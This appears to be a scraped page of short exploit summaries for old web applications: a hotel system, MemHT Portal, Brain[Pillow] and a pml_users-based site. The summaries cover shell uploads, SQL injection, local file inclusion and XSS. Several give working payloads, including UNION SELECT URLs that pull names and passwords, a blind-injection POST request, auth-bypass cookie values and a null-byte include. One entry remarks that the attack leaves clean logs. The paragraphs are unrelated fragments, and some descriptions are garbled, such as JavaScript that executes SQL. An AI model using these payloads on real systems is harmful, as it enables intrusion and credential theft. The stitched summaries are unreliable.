A vulnerability in the SAS Hotel Management System allows an attacker to upload a malicious shell to the server. The attacker can register an account on the website and upload a malicious shell as a profile picture. The malicious shell can then be accessed at the upload_images directory. This vulnerability affects versions prior to 1.0.1.
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' and 'passcode' parameters of the 'login.php' script. A remote attacker can send a specially crafted HTTP request with malicious JavaScript code to the vulnerable script and execute arbitrary SQL commands in the application database. This can be exploited to bypass authentication and gain access to the application.
Attacker must be logged in as user. Exploit is using "preg_replace" e-modifier. "register_globals" setting does not matter. Sentinel will not stop this exploit. POST method will leave clean logs in most real-world cases.
A local attacker could perform a symlink attack to overwrite arbitrary files on the system with root privileges, inject arguments to the 'kill' command to terminate or send arbitrary signals to any process(es) as root or launch a denial of service attack by preventing the virtual machines from starting.
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of 'myhotel_info.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to sensitive information, modify data, etc.
MemHT Portal is vulnerable to a SQL injection vulnerability in the 'deletenewpm' parameter of the 'pages/pvtmsg/index.php' script. An attacker can send a malicious payload to the 'deletenewpm' parameter to delete all private messages from the database. This vulnerability works regardless of php.ini settings.
Brain[Pillow] is vulnerable to Blind SQL-Injection, Standart SQL-Injection, SQL-Injection in Auth, Local Include and Shell Upload. Blind SQL-Injection can be exploited by sending a crafted request to the vulnerable application with magic quotes set to off. Standart SQL-Injection can be exploited by sending a crafted request to the vulnerable application with magic quotes set to off. SQL-Injection in Auth can be exploited by setting the cookie nova_name to admin'# and nova_password to 1c20a3e48e3b6607fedded430a20f606 with magic quotes set to off. Local Include can be exploited by setting the cookie nova_lang to ../index.php%00 with no cookie nova_name in the browser and magic quotes set to off. Shell Upload can be exploited by sending a crafted request to the vulnerable application with magic quotes set to off and uploading a shell with .php extension.
SQL-injection #1 requires magic quotes to be off and the user to be logged in as a registered user. An example of the exploit is '/edituser.php?Active=index&action=details&ID=-850'+union+select+0,name,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+pml_users+limit+1,1/*'. SQL-injection #2 requires magic quotes to be off and is a blind injection. An example of the exploit is 'POST /activate.php?action=resendsave HTTP/1.1 Host: localhost Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 65 ReSendUser=cekac' union select 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6#'. SQL-injection #3 requires magic quotes to be off. An example of the exploit is '/list.php?Active=INTERNET_OPASNOSTE'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(char(58),name,pass,email,icq),23,24,25,26,27,28,29,30,31,32,33+from+pml_users+where+name='admin'+and+1='1'. Passive XSS examples are '/edituser.php?Active=index&Display=&&action=<h1>onotole power</h1>' and '/edituser.php?Active=index&Display=&action=&F=&fltname='><h1>upyachka,upyachka</h1><div style=display:none>'
This exploit allows an attacker to execute arbitrary commands on the vulnerable system. It is triggered by sending a malicious HTTP POST request to the vulnerable application. The exploit also affects multiple LFI vulnerabilities, which require register globals to be enabled.
This exploit allows an attacker to upload a malicious file to the vulnerable server. The malicious file contains a payload which allows the attacker to execute arbitrary commands on the server. The vulnerability exists due to insufficient validation of the uploaded file. The exploit was discovered by Sp3shial and was published in 2008.
Services By CQR